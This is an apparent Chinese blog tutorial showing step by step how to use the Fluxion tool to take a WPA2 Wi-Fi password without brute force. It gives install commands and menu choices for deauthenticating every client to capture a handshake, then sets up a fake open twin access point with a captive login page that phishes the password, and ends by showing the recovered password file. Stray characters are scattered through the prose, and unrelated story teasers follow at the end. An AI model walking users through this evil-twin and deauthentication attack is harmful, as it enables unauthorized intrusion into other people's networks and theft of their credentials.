Hacking any WPA/WPA2 PSK without BruteForce

Fluxion is based on the programs such as aircrack-ng, mdk3, hostapd etc.

實驗所需文件

準備條件

下載下來之后

┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──? $ls
add.py  airmon  arch-install  fluxion  Installer.sh  LICENSE  logos.zip  README.md  remove.py
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──? $chmod 777 *
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──? $apt-get update
┌─[?]─[thekingofnight@parrot]─[~/Desktop/test/test]
└──? $sudo proxychains ./Installer.sh

等待安裝完成蝎抽,完成標志垮兑,再次運行Installer.sh宇姚,結(jié)果如下

#########################################################
#                                                       #
#      FLUXION 2    < Fluxion Is The Future >           #
# by Deltax, Strasharo and ApatheticEuphoria            #
#                                                       #
#########################################################


Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airodump-ng.....OK!
Bully...........OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Openssl.........OK!
Php-cgi........OK!
Pyrit...........OK!
Python..........OK!
Reaver..........OK!
rfkill..........OK!
Unzip...........OK!
Xterm...........OK!
Zenity..........OK!
strings..........OK!
fuser............OK!

./fluxion

實戰(zhàn)

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] Select your language
                                       
      [1] English          
      [2] German      
      [3] Romanian     
      [4] Turkish    
      [5] Spanish    
      [6] Chinese   
      [7] Italian   
      [8] Czech   
      [9] Greek   
                                       
[deltaxflux@fluxion]-[~]

這樣即是運行成功,這里以English舉例

[i] Select channel
                                       
      [1] All channels           
      [2] Specific channel(s)       
      [3] Back        
                                       
[deltaxflux@fluxion]-[~]1

選擇1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


                        WIFI LIST 

 ID      MAC                      CHAN    SECU     PWR   ESSID

......

 [37]   90:94:xx:xx:xx:xx     11     WPA2     65%     theKingOfNight

......
 (*) Active clients

        Select target. For rescan type r

選擇37

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )

[i] Select Attack Option
                                       
      [1] FakeAP - Hostapd (Recommended)
      [2] FakeAP - airbase-ng (Slower connection)
      [3] WPS-SLAUGHTER - Bruteforce WPS Pin
      [4] Bruteforce - (Handshake is required)
      [5] Back

選擇1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )


handshake location  (Example: /home/thekingofnight/Desktop/test/test.cap)
Press ENTER to skip

Path: 

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] Handshake check
                                       
      [1] aircrack-ng (Miss chance)
      [2] pyrit
      [3] Back
                                       
[deltaxflux@fluxion]-[~]1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] *Capture Handshake*
                                       
      [1] Deauth all
      [2] Deauth all [mdk3]
      [3] Deauth target 
      [4] Rescan networks 
      [5] Exit
                                       
[deltaxflux@fluxion]-[~]1

使所有用戶斷開wifi感耙,然后默認設(shè)備會自動重連wifi,也就給我們一個握手包环壤。

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


[i] *Capture Handshake* 

Status handshake: 

      [1] Check handshake
      [2] Back (Select another deauth method)
      [3] Select another network
      [4] Exit
      #> 1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 0.23    < Fluxion Is The Future >       ]
[ by Deltax, Strasharo and ApatheticEuphoria           ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]


INFO WIFI

               SSID = theKingOfNight / WPA2
               Channel = 11
               Speed = 30 Mbps
               BSSID = 90:94:97:xx:xx:xx ( )


[i] Select your option

      [1] Web Interface
      [2] Bruteforce
      [3] Exit

#?1   

[i] Select Login Page

      [1]  English     [ENG]  (NEUTRA)
      [2]  German      [GER]  (NEUTRA)
      [3]  Russian     [RUS]  (NEUTRA)
      [4]  Italian     [IT]   (NEUTRA)
      [5]  Spanish     [ESP]  (NEUTRA)
      [6]  Portuguese  [POR]  (NEUTRA)
      [7]  Chinese     [CN]   (NEUTRA)
      [8]  French      [FR]   (NEUTRA)
      [9]  Turkish     [TR]   (NEUTRA)
      [10] Romanian    [RO]   (NEUTRA)
      [11] Hungarian   [HU]   (NEUTRA)
      [12] Arabic      [ARA]  (NEUTRA)
      [13] Greek       [GR]   (NEUTRA)
      [14] Czech       [CZ]   (NEUTRA)
      [15] Norwegian   [NO]   (NEUTRA)
      [16] Bulgarian   [BG]   (NEUTRA)
      [17] Serbia      [SRB]  (NEUTRA)
      [18] Polish      [PL]   (NEUTRA)
      [19] Indonesia   [ID]   (NEUTRA)
      [20] Dutch       [NL]   (NEUTRA)
      [21] Danish      [DAN]  (NEUTRA)
      [22] Hebrew      [HE]  (NEUTRA)
      [23] Thailand     [TH]  (NEUTRA)
      [24] Belkin      [ENG]
      [25] Netgear     [ENG]
      [26] Huawei      [ENG]
      [27] Verizon     [ENG]
      [28] Netgear     [ESP]
      [29] Arris       [ESP]
      [30] Vodafone    [ESP]
      [31] TP-Link     [ENG]
      [32] TP-Link     [ITA]
      [33] Back

#? 7

現(xiàn)在會出來一個名稱一樣的涯保,開放的wifi熱點诉濒,之前加密的已經(jīng)連接不上了。


image.png

安全意識不高的人們會默認連接名稱相同的開放熱點

此時夕春,鏈接上網(wǎng)絡(luò)的設(shè)備使用瀏覽器或者app默認會跳轉(zhuǎn)到如下界面


image.png

輸入完成后未荒,頁面跳轉(zhuǎn)為


image.png

手機端也類似


image.png

最后

┌─[root@parrot]─[/home/thekingofnight/Desktop/test/test]
└──? #cat /root/theKingOfNight-password.txt 

    FLUX 0.23 by deltax

    SSID: theKingOfNight
    BSSID: 90:94:xx:xx:xx:xx ()
    Channel: 11
    Security: WPA2
    Time: 00:15:16
    Password: 1234567890

一些坑

恢復網(wǎng)絡(luò)的解決方法

┌─[?]─[root@parrot]─[/home/thekingofnight]
└──? #ifconfig wlan0mon down
┌─[root@parrot]─[/home/thekingofnight]
└──? #iwconfig wlan0mon channel 11
┌─[root@parrot]─[/home/thekingofnight]
└──? #service network-manager start

Fluxion無法監(jiān)聽的解決方法

airmon-ng check kill
airmon-ng start wlan0

參考

https://www.youtube.com/watch?v=gwF2mcbmfKQ&list=PLjo33Hih06ps2dlJMflCU7tYA7dzk_xYl&index=29

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末,一起剝皮案震驚了整個濱河市及志,隨后出現(xiàn)的幾起案子片排,更是在濱河造成了極大的恐慌寨腔,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,372評論 6 498
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件率寡,死亡現(xiàn)場離奇詭異迫卢,居然都是意外死亡,警方通過查閱死者的電腦和手機冶共,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門乾蛤,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人比默,你說我怎么就攤上這事幻捏。” “怎么了命咐?”我有些...
    開封第一講書人閱讀 162,415評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長谐岁。 經(jīng)常有香客問我醋奠,道長,這世上最難降的妖魔是什么伊佃? 我笑而不...
    開封第一講書人閱讀 58,157評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任窜司,我火速辦了婚禮,結(jié)果婚禮上航揉,老公的妹妹穿的比我還像新娘塞祈。我一直安慰自己,他們只是感情好帅涂,可當我...
    茶點故事閱讀 67,171評論 6 388
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布议薪。 她就那樣靜靜地躺著,像睡著了一般媳友。 火紅的嫁衣襯著肌膚如雪斯议。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,125評論 1 297
  • 城市分裂傳說
    那天醇锚,我揣著相機與錄音哼御,去河邊找鬼。 笑死焊唬,一個胖子當著我的面吹牛恋昼,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播赶促,決...
    沈念sama閱讀 40,028評論 3 417
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼液肌,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了芳杏?” 一聲冷哼從身側(cè)響起矩屁,我...
    開封第一講書人閱讀 38,887評論 0 274
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤辟宗,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后吝秕,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體泊脐,經(jīng)...
    沈念sama閱讀 45,310評論 1 310
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,533評論 2 332
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年烁峭,在試婚紗的時候發(fā)現(xiàn)自己被綠了容客。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,690評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡约郁,死狀恐怖缩挑,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情鬓梅,我是刑警寧澤供置,帶...
    沈念sama閱讀 35,411評論 5 343
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布,位于F島的核電站绽快,受9級特大地震影響芥丧,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜坊罢,卻給世界環(huán)境...
    茶點故事閱讀 41,004評論 3 325
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一续担、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧活孩,春花似錦物遇、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 一樁弒父案询兴,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至航夺,卻和暖如春蕉朵,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背阳掐。 一陣腳步聲響...
    開封第一講書人閱讀 32,812評論 1 268
  • 情欲美人皮
    我被黑心中介騙來泰國打工始衅, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人缭保。 一個月前我還...
    沈念sama閱讀 47,693評論 2 368
  • 代替公主和親
    正文 我出身青樓汛闸,卻偏偏與公主長得像,于是被迫代替她去往敵國和親艺骂。 傳聞我的和親對象是個殘疾皇子诸老,可洞房花燭夜當晚...
    茶點故事閱讀 44,577評論 2 353

推薦閱讀更多精彩內(nèi)容